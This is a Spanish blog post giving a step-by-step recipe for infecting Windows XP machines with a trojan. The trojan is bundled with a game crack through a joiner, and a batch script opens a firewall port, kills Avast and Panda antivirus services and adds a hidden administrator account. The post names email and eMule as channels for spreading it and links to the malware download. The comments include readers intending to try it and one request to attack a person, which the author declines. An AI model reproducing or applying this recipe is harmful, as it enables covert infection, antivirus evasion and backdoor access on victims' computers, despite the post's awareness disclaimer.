abril 23, 2024

Infectar un sistema fácilmente con un troyano

13
Voiced by Amazon Polly
Comparte en redes sociales

Este post no es para fomentar la piratería, es un ejemplo de lo importante que es ejecutar archivos que no sabemos de donde proceden.

Pasos para preparar la infección para Windows XP SP2:

1º Buscamos un troyano, son fáciles de encontrar, google es nuestro mejor aliado. En este caso e usado uno muy sencillo y eficaz Cabronator 3.

2º Buscamos un Joiner, una herramienta que sirve para juntar los archivos ejecutables y hacer que uno se ejecute visible y otros invisibles. En este caso e usado Cactus Joiner 2.0 sacado de elhacker, un joiner que permite juntar 25 archivos y encryptarlos de forma que un antivirus no puede detectar virus adjuntos, hasta el momento de su ejecución.

3º Un cebo, un crack de algún juego que este de moda. Este crack será lo que juntemos con el troyano y un archivo bat para hacer mas eficaz el troyano.

4º Nos preparamos un bat que pueda abrir los puertos del troyano y desactive el antivirus. El bat del ejemplo solo desactiva el Panda y el Avast! pero se puede hacer con todos los antivirus.
Ejemplo:

:Esta linea abre el puerto del troyano en el firewall de windows Xp
netsh firewall set portopenig tcp 5555 tcp5555 enable

:Estas lineas desactivan el antivirus Avast!
taskkill /f /im ashserv.exe
taskkill /f /im ashdisp.exe
taskkill /f /im ashmaisv.exe
net stop avast! Antivirus
net stop avast! iAVS4 Control Service
net stop avast! Mail Scanner
net stop avast! Web Scanner

:Estas el Panda
taskkill /f /im APVXDWIN.EXE
net stop Panda anti-virus service

:Estas crean el usuario Alvaro con contraseña hola y le da privilegios
net user Alvaro hola /add
net localgroup administradores Alvaro /add

5º Despues juntamos el bat, el troyano y el cebo con el joiner y elegimos que todo se ejecute oculto menos el cebo en este caso un crack de un juego.

6º Solo nos queda un medio de difusión: e-mail, emule …

Este es un modelo de infección muy básico, aunque el joiner oculte el troyano cuando se descomprima el antivirus lo detectaría, pero al ejecutarse el bat desactiva el antivirus, con el inconveniente de que cuando se reinicie la maquina el antivirus se volverá activar y encontrara el virus.
Este post es para explicar porque no se deben ejecutar archivos adjuntos de correos electrónicos de fuentes desconocidas o archivos ejecutables descargados de sitios que no son de confianza.

Cactus Joiner 2.0
http://foro.elhacker.net/index.php/topic=131276.0.html

Troyano Cabronator 3 información:
http://www.perantivirus.com/sosvirus/virufamo/cabronat.htm

Troyano Cabronator 3 descarga:
http://kakoweb.iespana.es/kakoweb/files/CaBrONaToR3KiLL.zip

13 pensamientos sobre “Infectar un sistema fácilmente con un troyano

  1. Claro que voy a probar en mi PC. Pero que tiene que ver colgar eso en el emule con la piratería, si cuelgo eso en el emule mas allá de la piratería voy a ser un HDP por andar subiendo virus para que otros se infecten sin algún propósito concreto, solo por diversión.

  2. Gracias por toda esta informacion, hacia dias q llevaba buscando algun tutorial como este… En breves lo probare.

    GRACIAS…

  3. necesito un virus para infectar un ordenador de una chica que esta obsesionada con mi pareja y nos acosa a el, a mi hijo y a mi, espero que me podeis ayudar. gracias

  4. Hola anónimo
    Siento mucho la situación que estas pasando, pero este es un blog que trata sobre seguridad informática y hacking ético, este post solo es una prueba de lo fácil que es hacer que un troyano infecte un sistema o que eluda el sistema de firmas de los antivirus. Decirte que aunque aquí se responda dicha pregunta será censurada lo más pronto posible. Lo mejor que puedes hacer es acudir a las autoridades competentes.
    Un saludo

Deja un comentario